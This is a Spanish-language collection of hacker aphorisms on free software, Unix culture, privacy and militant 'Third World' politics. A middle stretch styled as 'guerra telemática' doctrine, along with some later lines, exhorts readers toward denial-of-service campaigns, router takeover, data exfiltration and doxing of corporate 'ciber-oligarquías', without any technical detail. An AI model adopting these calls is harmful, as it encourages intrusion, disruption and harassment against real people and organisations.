Tenemos que formar programadores capaces de comentar y programadores capaces de compilar.
En este caso se trata de formar, en lo posible, el mayor n�mero de hombres capaces de programar c�digo fuente, porque en este pa�s, hasta ahora, no hemos formado m�s que hombres capaces de usar paquetes binarios.
Vi$ual $tudio demanda tres cosas: el compilador, la CPU y el hacker.
Quien compila un kernel, puede compilar un Hola Tercer Mundo.
Si quieres aprender a compilar, logu�ate a un Pubnix.
Copiar bugs es m�s f�cil que depurarlos.
La UEFI no tiene verg�enza de lo que es. Y deber�a.
Donde hay GCC hay alegr�a.
Muchas veces ante la necesidad el hombre no repara de la licencia.
/dev/null es un cementerio que no requiere obituarios.
El mayor peligro con los criptoactivos es que esencialmente usted se convierte en su propio banco. Si comienza a parlotear sobre los millones de representaciones del trabajo ajeno que de alguna manera cree poseer, a la vez que se convierte en negro de activos, activamente se convertir� en blanco de un negro.
Las aplicaciones de terminal remota son casi tan antiguas como las redes de datos de paquetes conmutados.
Protocolos como SUPDUP, los rlogin y rsh de BSD y hasta el Telnet tuvieron roles importantes en el desarrollo de la Internet. Y se los comieron como a un pollo.
Antes que Wa$ap, prefiero SUPDUP.
SSH transmite estrictamente de a un caracter por vez, operando - tanto la edici�n de l�nea como el eco - en el host remoto. No resulta extra�o entonces que su desempe�o interactivo deje que desear en las redes de �rea amplia y sea mediocre en los tendidos transcontinentales.
Un tr�fico tupido o una tasa de se�al/ruido degradada puede provocar retrasos de varios segundos en los enlaces, sometiendo buffers a largas colas de paquetes, o bien sustentando el celo en las retransmisiones de capa de enlace. S�rvete de esto para hostilizar comunicaciones.
No pocos hackers efect�an una instalaci�n de una versi�n croma��n apenas funcional, para actualizarla desde Lentonet al �ltimo eslab�n de la evoluci�n maquinal.
Compila herramientas de c�mputo que descolonicen, redistribuyan valor, conspiren y organicen al Pueblo.
Inherente al concepto de red inform�tica para compartir recursos se encuentra la idea de un modo de trabajo cooperativo y colaborativo. Esto exige un "lugar para las mentes de los Pueblos", una capacidad extendida de conciencia para preocuparse por el bienestar del conjunto en l�nea.
Todo flujo de datos cuesta. C�rgaselo al oligarca mediante asfixiantes impuestos progresivos.
Cuando no comprendas el significado de una pantalla azul, habr�s alcanzado la verdadera iluminaci�n.
Cuando comprendas el significado de una pantalla azul, habr�s descendido al averno.
Los archivos codificados en ASCII y UTF-8 son excepcionalmente buenos para abandonar la vacuidad de redes sociales orientadas a memes.
La telara�a de alcance global es en realidad una red compleja de redes de datos menores, de alcance regional. A su vez, se enlazan a ellas redes locales a�n m�s peque�as o computadoras individuales.
La telara�a de alcance global es m�s que una maravilla tecnol�gica. Es la comunicaci�n popular en su nivel m�s fundamental.
S�lo los Pueblos conocen la verdadera extensi�n de la telara�a de alcance global.
Gran parte de la telara�a de alcance global consiste en bibliotecas acad�micas, bases de datos y cualquier cosa inaccesible a los motores de b�squeda cautivos por empresas orientadas a metadatos.
Co-habita toda red tan oscura como la piel de mis grasitas. Te iluminar�.
Estar enlazado a la Red implica algo m�s que simplemente leer conferencias y registros computarizados. Implica hacer y responder interrogantess, intercambiar opiniones, involucrarse en la Liberaci�n del Tercer Mundo.
Si decides loguearte, usar la red de datos y contribuir, te convertir�s en un "ciudadano del ciber-espacio".
Ser un ciudadano del ciber-espacio le parecer� la cosa m�s natural del mundo.
Cede a las ciber-oligarqu�as, y ver�s privadas a las ciudades del Tercer Mundo de aire acondicionado a cambio de correr programas de IA s�lo para sintetizar imaginer�a de chicas con manos de empanada.
Hasta los sabios m�s r�gidos, austeros y barbudos pueden hacer con Unix lo que normalmente no se les permite a las personas serias: jugar.
Hay varias posibilidades de contemplar el mundo. Los padres intelectuales de la calculadora electr�nica lo conceb�an como una gran instalaci�n compuesta de informaciones.
Durante muchos siglos, cuando se hablaba de m�quinas, el hombre se refer�a exclusivamente a las de fuerza y nada m�s. Fue una mujer la que pergeni� una que facilitara aceptar, elaborar y devolver informaci�n.
Si puedes fabricar tus propias herramientas, hardware y software, �entonces hazlo!
Cada invenci�n ha ser ingeniada para 100 usuarias del Tercer Mundo.
El destino de nuestras computadoras es convertirse en amplificadores intelectuales interactivos, para que una red de datos de �rea amplia incluya a quienes est�n en y con nuestro Tercer Mundo.
Da forma computacional a los logros humanos del Tercer Mundo.
Nunca emparches, jam�s reinicies.
Pin de oro no mejora la CPU.
El trato no hermana al hardware con el software privativo. Lo hace la opresi�n.
M�s ense�a el software comunitario que el privativo.
No todos copian el c�digo que usan. Algunos lo mejoran.
Si el puerto serial tiene 25 pines, s�lo usa 9.
Nunca permitas que una EULA te entorpezca decompilar.
He preferido estudiar el c�digo fuente a hacerle caso a un abogado capitalista.
Mete las patas en el c�digo fuente.
La copia vence a la EULA.
No hay EULA que dure cien a�os.
Cuando no hay C, de todo compilo.
Tener una CPU de doble n�cleo no te hace b�gamo.
Quien compile, que lleva GNU en un pendrive.
SSH y estudio, te abrir�n todos los puertos.
Si tu programa no funciona, depura la subrutina que no considerabas importante.
Si aquellas tecnolog�as fuesen inteligentes, amar�an al Pueblo.
Si la IA fuese inteligente no necesitar�a ser entrenada, har�a arder a los Pueblos del Tercer Mundo con metamensajes de decapitaci�n contra las Oligarqu�as que lo han dominado.
El mal compilador hace peores binarios.
Nunca sue�o cuando programo, sino cuando compilo.
Quien a tu Pubnix entra de Invitado, hurga en tu /home.
El Javascript mal escrito, si no la caga en la entrada, la caga en la salida.
El m�dem abre las l�neas. El router, cierra los puertos.
Buena memoria no pierde bytes.
Diskette en diskettera, y CD-ROM en CD-ROMera.
La CPU no sabe lo que compila, y muchas veces el programador tampoco.
Se aprende a compilar, compilando.
Window$ ni siquiera llega a ser un sistema para jugar jueguitos.
No es lo mismo BSD que BSoD.
En el fondo, la BSoD es una muestra de Justicia Social.
Conoce tu hardware como a t� mismo.
Con�cete a t� mismo como a tu hardware.
Conoce lo suficiente sobre tu objetivo humano, conoce todo sobre su c�mputo.
Copiad el c�digo los unos a los otros.
Copiad y distribu�d todos de �l, pues este es mi c�digo.
COM1 es mi mouse, COM2 es mi m�dem.
El c�digo fuente es, al fin de cuentas, una alegor�a.
GCC act�a como un mes�as al que indistintamente puede o�rselo como a un maestro, percib�rselo como a un milagrero, o dej�rselo clavado y colgado en un segundo plano.
Algunas computadoras han sido programadas para considerar que los humanos tienen las respuestas, y �stos las han llamado artificialmente inteligentes.
Reprograma tu router para que tenga mil ojos y mil o�dos. Que todos sensibilicen al Pueblo.
Algunos bugs en el software son bastante dif�ciles de identificar y duplicar.
Las miradas no hacen saltar los bugs a la vista. Lo que permite caracterizar los problemas inform�ticos es la libertad de distribuir copias modificadas.
Para resolver problemas inform�ticos interesantes, comienza por buscarlos en la lucha telem�tica contra el Capital.
El PIN perfecto no tiene cuatro d�gitos ni est� asociado con tu vida; es algo que te resulta f�cil de recordar y el dif�cil que tenga sentido para otra gente siquiera.
De la calidad de la licencia dependen las libertades de una comunidad.
�CPU, Compilador y Disco!
�Todo el poder de c�mputo a los hackers!
IA adoctrinada con Justicialismo producir� Justicia Social.
IA adoctrinada con basura producir� basura.
Entuba todos los discursos de la ciber-oligarqu�a a /dev/null.
La arquitectura de hardware determina menos el portado del software, que el concepto social de la licencia que �l mismo porta.
Una vez dominadas por la Masa, las ideas correctas - caracter�sticas de una licencia libre de avanzada - se vuelven una fuerza material capaz de transformar la sociedad y el mundo.
Disemina las ideas correctas de las licencias libres de avanzada en todas las redes sociales basadas en empresas que habites.
Los postulados de la guerra telem�tica constituyen un problema que debe estudiar y resolver quienquiera que conduzca una guerra telem�tica.
Estamos haciendo una guerra. Nuestra guerra es una guerra telem�tica, y esta se desarrolla en las redes de datos, tendidos semicoloniales y semifeudales.
Para un SysAdmin es signo de progreso y desarrollo el pasar de ser capaz de dirigir inicialmente s�lo un peque�o pubnix a ser capaz de dirigir un cl�ster.
Para un SysAdmin, es signo de progreso y desarrollo el pasar de ser capaz de operar inicialmente en un sistema operativo que conoce bien, a ser capaz de operar en muchos sistemas operativos.
Si un SysAdmin no pasa de ser capaz de administrar s�lo un determinado sistema operativo, en un determinado pubnix, y en una determinada etapa de desarrollo de la guerra telem�tica, eso demuestra que no ha hecho ning�n progreso ni alcanzado ning�n desarrollo.
Hay usuarios que, satisfechos con una sola habilidad y una visi�n estrecha, jam�s hacen progreso alguno. Tales usuarios, aunque pueden desempe�ar alg�n papel en la guerra telem�tica en un lugar y momento dados, no pueden desempe�ar un gran papel. Necesitamos hackers que puedan desempe�ar un papel importante.
�Por qu� no ha de servirnos el c�digo adquiridos en el pasado que cost� depuraci�n? Si bien debemos apreciar la experiencia adquirida en el pasado a costa de la depuraci�n, debemos tambi�n apreciar la experiencia que hemos adquirido con nuestros propios bugs.
La historia conoce s�lo dos tipos de guerras: las justas y las injustas. La guerra telem�tica es una guerra justa.
Con nuestras propias CPUs pondremos fin a la �poca de las guerras telem�ticas en la historia de la humanidad.
La guerra telem�tica que ahora hacemos es indudablemente parte de la guerra final que libran los Pueblos del Tercer Mundo.
Una guerra telem�tica sostenida por la gran mayor�a de la humanidad y de los Pueblos del Tercer Mundo es indiscutiblemente una guerra justa, es la empresa m�s sublime y gloriosa para salvar a la humanidad, y un puente que conduce a una nueva era en la historia mundial.
Una situaci�n de guerra telem�tica de conjunto puede abarcar el mundo entero, un importante centro de datos, un Pubnix independiente, o un microrouter.
En la guerra telem�tica, toma en consideraci�n la relaci�n entre las ciberoligarqu�as y los hackers.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre las diversas campa�as de Denegaci�n de Servicio y entre las diversas etapas de operaci�n.
En la guerra telem�tica, toma en consideraci�n ciertas partes que son importantes (decisivas) para la situaci�n de conjunto.
En la guerra telem�tica, toma en consideraci�n las caracter�sticas espec�ficas de la situaci�n general en las redes de datos.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el frontend y el backend.
En la guerra telem�tica toma en consideraci�n la distinci�n fluida as� como la conexi�n entre hardware da�ado y el repuesto.
En la guerra telem�tica, toma en consideraci�n la relaci�n entre el n�cleo operativo y en idle, entre un hacker programando y descansando.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre la concentraci�n y la dispersi�n de la potencia de c�mputo.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el ataque paquetizado y la defensa de cortafuegos.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre infiltraci�n telem�tica, y la exfiltraci�n de datos.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre ofuscar y exponer una pseudo-identidad.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el ataque principal para el sabotaje telem�tico, y los ataques segundarios para la denegaci�n de servicios.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el asalto telem�tico y la contenci�n de paquetes.
En la gurra telem�tica, toma en consideraci�n la relaci�n fluida entre la centralizaci�n y la descentralizaci�n de almacenamiento.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre la transmisi�n prolongada y la transmisi�n burst.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre tomar los routers y moverse entre los routers.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los nodos propios, y los nodos vecinos.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el hardware y el software libre.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los hackers y los usuarios.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los programadores y los usuarios.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los power-users y los usuarios.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los magos Unix y los power-users.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los hackers y los programadores.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los routers dominados y los accesibles.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los routers dominados viejos, y los routers dominados nuevos.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el hardware dominado y sus perif�ricos.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los horarios de baja demanda y el horario pico de conexi�n.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el servidor ca�do y el volteado.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los grandes centros de datos y los pubnix.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre los hackers y los cibercirujas.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el aniquilamiento del hardware enemigo, y el de hackearlo para las masas.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre reparar hardware, y reprogramarlo para que haga lo que nosotros queremos.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre hackear y adoctrinar.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el retroc�mputo y el c�mputo.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre el c�mputo actual, y el futuro.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre un hackeo en condiciones diferentes.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre IP fijas e IP din�micas.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre la apropiaci�n tecnol�gico-cultural y la destrucci�n tecnol�gico-cultural.
En la guerra telem�tica, toma en consideraci�n la relaci�n fluida entre la etapa de ciber-resistencias, y la de ciber-aniquilaci�n.
Los problemas que presenta la guerra telem�tica, mas que verlos en pantalla, el hacker puede inferirlos en su coraz�n.
IRL, no podemos exigir hackers invictos. La historia conoce muy pocos. Necesitamos hackers valerosos y sagaces que por lo com�n liberen su software en el curso de una guerra telem�tica.
Para llegar a ser un hacker valeroso y sagaz, es necesario asimilar un m�todo, en el que es indispensable tanto el estudio como la aplicaci�n de lo aprendido.
En la guerra telem�tica, las dos partes beligerantes son grupos de seres vivos telem�ticamente armados, y cada una guarda para s� sus secretos t�cticos. Sin embargo los hackers del Tercer Mundo tienen la desventaja de publicar su estrategia bajo GPLv3, mientras que las ciber-oligarqu�as jam�s lo hacen.
El objetivo de los hackers no puede ser otro que guiar a los Pueblos por la senda de la Liberaci�n inform�tica.
Como traza paralela, nuestros hackers pueden efectuar la ingenier�a inversa al hardware de las ciber-oligarqu�as, reemplazando todo software de dominaci�n por uno dominado por nosotros mismos.
Todo programa de la lid telem�tica debe basarse en un sondeo telem�tico y en un esmerado estudio de la situaci�n del sistema enemigo, la situaci�n del propio, y la fluidez de las comunicaciones entre ambos.
El proceso de conocimiento de una situaci�n de lid telem�tica no s�lo tiene lugar antes, sino tambi�n despu�s de la escritura del c�digo del programa de lucha telem�tica.
Entre el momento en que el programa de combate telem�tico comienza a ejecutarse y la finalizaci�n de su ejecuci�n, media otro proceso de conocimiento de la situaci�n: el de la aplicaci�n del programa. En dicho lapso es necesario comprobar nuevamente si el programa en ejecuci�n corresponde a la situaci�n actual de lucha.
Un hacker impulsivo que no comprenda la necesidad de modificar su programa o no quiera hacerlo, chocar� inevitablemente contra el muro de la obsolescencia.
El programador es un hombre que compila sin mirar al lado y sin mirar atr�s. El hacker es el hombre que persuade para que todos compilemos, simult�neamente, lo que tenemos que compilar.
Un hacker del Tercer Mundo es aqu�l que ayuda a lograr el potencial de las redes de computadoras para la Comunidad Organizada en su conjunto.
Un hacker del Tercer Mundo - si estudia con modestia - llegar� a conocer perfectamente las caracter�sticas de sus sistemas operativos (la suma de los factores representados por los comandos, los programas, sus tendidos, su hardware, etc�tera), aquellos de las ciber-oligarqu�as, y todas las dem�s condiciones relativas a la guerra telem�tica.
Los hackers del Tercer Mundo han llegado a conocer la situaci�n del Pueblo y la de las ciber-oligarqu�as, descubriendo los postulados de la acci�n telem�tica al resolver la contradicci�n entre lo objetivo de la realidad del Mundo y lo subjetivo de su apreciaci�n.
Al igual que sucede con su c�digo, un hacker del Tercer Mundo goza de mayor seguridad en el combate telem�tico - y tiene mayores posibiliades de conquistar una victoria - cuando �ste es compartido por todos.
Todas las teor�as y postulados de la guerra telem�tica que tienen caracter de principios, son la s�ntesis de las experiencias de las telecomunicaciones pasadas.
Los hackers del Tercer mundo deben estudiar con seriedad las lecciones legadas por las guerras telem�ticas pasadas, que han sido devengadas con servidores ca�dos y formateos.
Los hackers del Tercer Mundo deben forkear el c�digo fuente de los programas de las guerras telem�ticas pasadas, extraer conlusiones, asimilar lo �til rechazar lo in�til, y sumarle su propio c�digo comentado que las modifique. S�lo esto los volver� valioso en el contexto actual.
Leer el c�digo es aprender; modificarlo tambi�n es aprender, y es una forma m�s iluminada de aprender.
La guerra telem�tica es una empresa que el Pueblo emprende contra las ciber-oligarqu�as que lo han dominado. En ella ocurre con frecuencia que el Pueblo - en lugar de ejecutar luego de haber programado - comienza por ejecutar y despu�s programar. Para el Pueblo, ejecutar es aprender.
El m�todo principal de multiplicaci�n que han seguido los hackers del Tercer Mundo es ense�arle al Pueblo a combatir a cable pelado en el frente mismo de la guerra telem�tica que les ha sido impuesta.
Entre un hacker y el Pueblo puede existir una cierta distancia, pero jam�s un cortafuegos. La distancia es superada con rapidez.
Todo integrante del Pueblo puede convertirse en Hacker. No es dif�cil cruzar el umbral, y para perfeccionarse s�lo es necesario propon�rselo y saber aprender.
Los postulados de la guerra telem�tica, como los de todos los dem�s fen�menos, son el reflejo en nuestra mente de la realidad objetiva.
Todo lo que existe fuera de nuestra mente es realidad objetiva. Todo lo que existe dentro de nuestra mente es realidad subjetiva. El programador debe convertir su realidad subjetiva en c�digo fuente. El compilador lo convertir� en c�digo objeto, y si lo dejamos, hasta en binario ejecutable.
Hay programadoras que son capaces de conocerse bien a s� mismas, pero no a las ciber-oligarqu�as; hay otras con las que sucede lo contrario. Ni �stas ni aqu�llas pueden resolver el problema de aprender y aplicar los postulados de la guerra telem�tica.
Navegando en la mar telem�tica, un mago Unix no s�lo debe evitar hundirse, sino que debe asegurarse la llegada a puerto seguro ante las tormentas de baudios.
Los postulados de la conducci�n telem�tica constituyen el arte de navegar en la mar telem�tica.
Los verdaderos usuarios no prueban todos los comandos del men� principal de la BBS, para luego volverlos a probar nuevamente para ver si hacen algo diferente y sorprendente.
Los verdaderos usuarios no asumen autom�ticamente que el SysOp estar� all� todo el tiempo, ni se molestan y presionan 10.000 veces Ctrl+G cuando no est�.
Los verdaderos usuarios no esperan que el finger del SysOp diga algo diferente a "No disponible".
Los verdaderos usuarios no solicitan constantemente al SysOp nuevos privilegios.
Los verdaderos usuarios no hacen las cosas para merecer privilegios.
Los verdaderos usuarios no dejan interrogantes inefables en la cartelera de mensajes p�blicos, ni aguardan respuestas a sus preguntas.
Los verdaderos usuarios no buscan gente importante entre los ficheros Finger para luego molestarlos con correspondencia electr�nica con solicitudes de pistas para convertirse en "Verdaderos Hackers".
Los verdaderos usuarios no tienen m�dems de 56.600 baudios.
Los verdaderos usuarios no esperan que el SysOp recuerde todo lo que alguna vez teclearon, sino que entienden que no son las personalidades m�s importantes de la cartelera.
Los verdaderos usuarios nos hacen b�squeda de comandos ocultos en los men�es de la BBS (por ejemplo, a, b, c, d, e ,f, g, g, i,....,!,@,#,$,
,,&,*).
Los verdaderos usuarios leen las noticias de la cartelera cuando las actualizan, de forma de no tener que buscar los comandos.
Los verdaderos usuarios hacen una copia dura del men� y los comandos en papel, de manera de no tener que volver continuamente a ellos.
Los verdaderos usuarios no vuelven a discar inmediatamente cuando se agot� su tiempo disponible.
Los verdaderos usuarios no temen cuando el SysOp levanta el tubo. Los verdaderos usuarios al menos reconocer�n que est�n all�.
Los verdaderos usuarios no esperan que las BBS est�n en l�nea las 24 horas del d�a.
Los verdaderos usuarios no se aburren de la terminal.
Los verdaderos usuarios no crean guerras est�pidas en las carteleras electr�nicas del tipo "Pepsi vs. Coca", sino "PETSCII vs. ASCII".
Los verdaderos usuarios no temen postear con su nombre de usuario.
Los verdaderos usuarios dif�cilmente posteen an�nimamente.
Los verdaderos usuarios disfrutan eliminar a los usuarios con Commodores que gustan postear afirmando que su microordenador de juguete es el mejor.
En la confrontaci�n entre quienes ten�an la Commodore 64 y quienes ten�an la TRASH-80, fue decicida: sobrevivieron los primeros.
El c�digo no se programa mediante GCC, sino mediante la escucha paciente, el di�logo y la cooperaci�n, que son los �nicos medios dignos de la persona humana para resolver los conflictos. El compilador s�lo despu�s de esto se usa.
Mientras los CEOs a menudo quieren convencernos de que s�lo valemos si compilamos c�digo, la GPLv3 nos recuerda la verdad del c�mputo: nuestro c�digo vale en comunidad.
He experimentado una vez m�s la vitalidad de los j�venes P�bnix locales. �Dejemos que su entusiasmo por la GPLv3 nos contagie para renovar el kernel en GNU!
Todos, cada usuario y usuaria, somos destinatarios de la invitaci�n de la GNU participar de la gracia de compilar y compartir. S�lo hace falta hacer un make a este c�digo fuente libre y compilarlo, permitiendo que se modifique.
Los que esperan el GCC, compilan sin cansarse.
Aguardar al depurador no es vergonzoso. Es vergonzoso no depurar.
No te averg�enzes de tu c�digo corto si es robusto.
Lo que derriba los cortafuegos y acorta las distancias no son tanto los baudios, la GPL, ni los compiladores, sino, sobre todo, la pr�ctica humana de la amistad, del encuentro, del mirarse a los ojos.
Si algo bueno existe y permanece en este Pubnix, es s�lo porque, en m�ltiples y variadas circunstancias, el software libre ha prevalecido sobre el privativo, la solidaridad sobre la indiferencia, la generosidad sobre el ego�smo.
Nada que sea perdurable se programa y modifica sin GPLv3.
La mayor distinci�n puede estar entre quienes favorecen la licencia GPL para proteger su comunidad, y quienes usan la licencia de estilo BSD para proteger su software.
La decisi�n m�s importante que debe tomar un creador de software es probablemente el licenciamiento, pues determina si otros podr�n crear versiones comerciales del software sin contribuir con el nuevo c�digo al proyecto.
La compilaci�n popular se hace posible cuando nos atrevemos a hackear la "shell" que frecuentemente nos encierra en nosotros mismos, y a salir de una programaci�n perezosa, c�moda, vivida solamente por una necesidad personal.
En el kernel de GNU, las periferias de la existencia son el centro: el Hurd est� poblado de servicios que se hallan en los m�rgenes, en los confines, pero que son convocadas por GNU y se convierten en protagonistas del software que el GCC ha venido a compilar.
La belleza de compartir no se experimenta tanto en los grandes binarios y ejecuciones, sino m�s bien en compartir y compilar compartir el c�digo que d�a a d�a nos esforzamos por modificar.
Un pueblo que compila tiene futuro.
Para el Pueblo, ejecutar es aprender.
M�s que ejecutar mis binarios, piensa en compartir tus versiones modificadas de mi c�digo.
Aunque no tengas nada que compilar, no te canses nunca de programar.
Nuestra instalaci�n de GNU comienza cuando acogemos humildemente al c�digo fuente en el disco de nuestra existencia, cuando le hacemos un espacio, cuando nos ponemos a modificarlo y en honor a la GPLv3 dejamos que ese c�digo sea alterado en un ciclo sinf�n por todas las dem�s.
La concordia se alcanza cuando cada hacker se compromete, no s�lo en funci�n de sus propias arquitecturas y de su propia visi�n, sino con vistas al bien de todos.
Nuestro mundo tecnol�gico y secularizado est� lleno de magos UNIX, ocultismo del software privativo, espiritismo de Java, astr�logos de Python y, por desgracia, de sectas de LISP.
Cada uno en su /home, y el SysAdmin en el de todos.
La acci�n social en materia del Pubnix deber� asegurar a cada usuario la posesi�n de un /home minimalista con los permisos adecuados.
Los rastros digitales son creados por ti y tambi�n por otras personas que publican activamente informaci�n. Esto incluye lo que escribes, publicas y compartes, as� como el contenido que otras personas crean acerca de t�.
En las redes sociales basadas en empresa tendr�s escaso o nulo control de tu propio rastro digital, especialmente cuando te etiquetan en fotos, te mencionan en posteos, o simplemente se comunican contigo a trav�s de un correo electr�nico o una sesi�n de chat.
El concepto de "rastros digitales" incluye datos que creas y ves de manera intencional - como las publicaciones electr�nicas que compartes en l�nea, lo que com�nmente llamamos como "contenido".
Los rastros digitales incluyen tambi�n datos que se crean acerca de tu contenido, com�nmente llamados "metadatos", y que en su mayor�a resultan invisibles.
Los diferentes tipos de rastros digitales que dejes ser�n registrados y almacenados por las ciber-oligarqu�as.
Los rastros digitales de uso de redes sociales basadas en empresas son constantemente recogidos, ordenados y analizados por las ciber-oligarqu�as a fin de crear o completar un perfilado individualizado, o un perfilado de masas.
Cada vez que se genera nueva informaci�n o metadato, este es registrado y agregado rutinariamente a otros datos preexistentes para refinar an�lisis computados. Si esto se relaciona a tu perfil electr�nico en redes sociales basadas en empresa, lo expandir�n continuamente.
Tus rastros digitales ofrecen a quienes tienen acceso a ellos una perspectiva muy detallada de qui�n eres (o c�mo te presentas), lo que te gusta, lo que sabes, lo que haces, tus h�bitos diarios, tus afiliaciones, organizaciones, y tus interacciones con los dem�s.
En las redes sociales basadas en empresas, los metadatos constituyen rastros digitales casi siempre creados de forma pasiva, sin que necesariamente usted caiga en cuenta, o siquiera lo consienta.
En las redes sociales basadas en empresas, tus h�bitos de navegaci�n y direcci�n IP son compartidas entre los sitios web que visitas y los servicios que utilizas, a fin de trazar tu comportamiento por seguimiento e inferencia digital.
En base a los registros rastros digitales que realicen las redes sociales basadas en empresa, se te presentar� publicidad vectorizada algor�tmicamente de productos y servicios que no necesitas.
Las redes sociales basadas en empresas venden datos que le pertenecen a usted y an�lisis acerca de usted a otras empresas e incluso a gobiernos con fines de lucro.
Ciertos individuos pueden desear la informaci�n en poder de empresas que gestionan redes sociales en l�nea para acosar, chantajear, o espiar a miembros de sus organizaciones y sus redes afectivas.
Las ciber-oligarqu�as se han impuesto conocer los detalles �ntimos de la vida de millones de personas a trav�s de la recopilaci�n de datos y su an�lisis.
El modelo de negocio con datos ajenos se aplica en la mayor parte de las aplicaciones y servicios gratuitos provistos por empresas.
Jam�s regales tus datos a cambio de servicios de c�mputo en poder de las ciber-oligarqu�as.
Frecuentemente, una recolecci�n y an�lisis en profundidad de un rastro digital puede permitirle a las ciber-oligarqu�as descubrir cosas acerca de ti que no sab�as.
Los datos generados por nuestras acciones digitales pueden ser comprados y vendidos a los anunciantes y los gobiernos, y pueden ser usados de diversas maneras para controlar, suprimir o silenciar activistas, perjudicar al compa�ero/a de alguien, o implicar a organizaciones.
Los datos agregados a redes sociales basadas en empresas, y el an�lisis de sus metadatos pueden ser utilizados para crear estrategias de acoso que da�en la reputaci�n o para atacar opiniones o credos.
Las ciber-oligarqu�as pueden tener acceso a tus datos y pueden acceder a ellos de diferentes maneras, incluyendo a trav�s de la vigilancia de tus actividades, el acceso remoto a dispositivos no cifrados, explotando la posibilidad de compartir datos entre aplicaciones, o por medio de la investigaci�n de fuentes de datos p�blicamente disponibles acerca tuyo.
Las ciber-oligarqu�as pueden utilizar tu rastro electr�nico para localizar nuevas fuentes de datos acerca de ti, y a trav�s de la agregaci�n y an�lisis de datos inferir cosas sobre tu vida y tu comportamiento.
Dependiendo de qui�n eres y lo que haces, es probable que tengas inquietudes diferentes acerca de qu� tipo de datos o "rastros digitales" pueden resultar los m�s sensibles para ti, as� como acerca de qui�n podr�a tener acceso a ellos. Pero en cualquier caso, aborrece a las ciber-oligarqu�as.
Preg�ntate si realmente necesitas registrar, enviar y transmitir todas las cosas que haces en tu vida a una plataforma digital dominada por la ciber-oligarqu�a.
Dejada al control de las ciber-oligarqu�as, no podr�s saber precisamente lo que sucede con tus rastros digitales, cuando son creados, ni qui�n tiene exactamente acceso a ellos.
Lucha por recuperar el control de tus rastros y sombras digitales.
Puedes controlar mejor lo que se conoce o lo que se da a ver acerca de ti en el ciberespacio, sin tener que renunciar por completo al uso de los celulares, ordenadores, correo electr�nico y redes sociales. S�lo renuncia a los servicios provistos por las ciber-oligarqu�as.
Limita qui�n puede recoger y usar tus datos digitales y los metadatos que estos generan.
Ayuda a tus compa�er@s a proteger sus propios datos y metadatos.
Reduce la cantidad de datos que pones en disponibilidad en las redes de datos.
Retira conscientemente metadatos valiosos de los contenidos que creas y compartes en las redes sociales basadas en empresas.
Las herramientas de remoci�n de publicidad y de cookies son una gran bendici�n y h�roes no reconocidos, as� como navegadores espec�ficos para evitar publicidad.
Practica el arte de ofuscar tu identidad en las redes.
Mantente al tanto de lo que las ciber-oligarqu�as pueden saber de ti.
Desarrolla maneras de alterar, separar, o re-crear nuevas presencias e identidades en l�nea.
El "doxing" consiste en recabar informaci�n detallada acerca de alguien recurriendo a fuentes libremente disponibles en l�nea.
El recabado de informaci�n detallada en l�nea sobre un sujeto de inter�s, puede implicar tambi�n el uso de m�todos ilegales para lograr acceso a ella.
Efect�a recabado de informaci�n por fuentes telem�ticas p�blicas que eventualmente sirvan para atacar preventivamente a las ciber-oligarqu�as.
El perfilado con fuentes p�blicas en l�nea puede utilizarse para detectar, identificar individuos y redes de organizaci�n, y aprovecharlas con fines maliciosos.
El doxing es un arma de doble filo, que se toma del filo. Usa un guante grueso en la forma de Tor.
El router es el mango de tu sart�n telem�tica. Inst�lale un firmware libre.
Ten siempre la sart�n telem�tica por el mango, y usa un guante grueso en la forma de Tor.
Incluso los hackers m�s biso�os emprenden la lucha diciendo: "Gracias por elegir el router dom�stico Wireless-N de Linksys by Cisco".
Tu contenido es tuyo.
Cuando publicas algo en la web, debe pertenecerte a t�, no a una corporaci�n.
Demasiadas compa��as de capital se han fundido y perdido los datos de todos sus usuarios.
Ret�n tu contenido en tus medios de almacenamiento, y estos bajo tu control.
Ret�n tu control inform�tico.
Aseg�rate que puedes postear todo lo que desees, en cualquier formato que desees, y que nadie te monitoree.
Comparte enlaces legibles simples, tales como misitioweb.com/ideas. Estos enlaces permanentes siempre funcionar�n.
En las redes de datos, rechaza todo espacio claustrof�bicos, con barreras que impiden construir, poseer y controlar.
Escapa de todos aquellos vericuetos de la red en los cuales s�lo puedes consumir.
En los Pubnix tendr�s mayor elecci�n de tu p�blico, ya sea posteando en privado o controlando tu alcance y audiencia.
En los Pubnix tendr�s la habilidad de corregir los enlaces URLS cuando se rompen o desaparecen.
En los Pubnix no tendr�s anuncios externos en tu sitio sin tu permiso expl�cito.
En los Pubnix nadie te monetizar�.
En los Pubnix no sufrir�s censura de tu contenido.
En los Pubnix no tendr�s t�rminos de servicio que se apropien de tu trabajo sin notificarte para anuncios u otros usos.
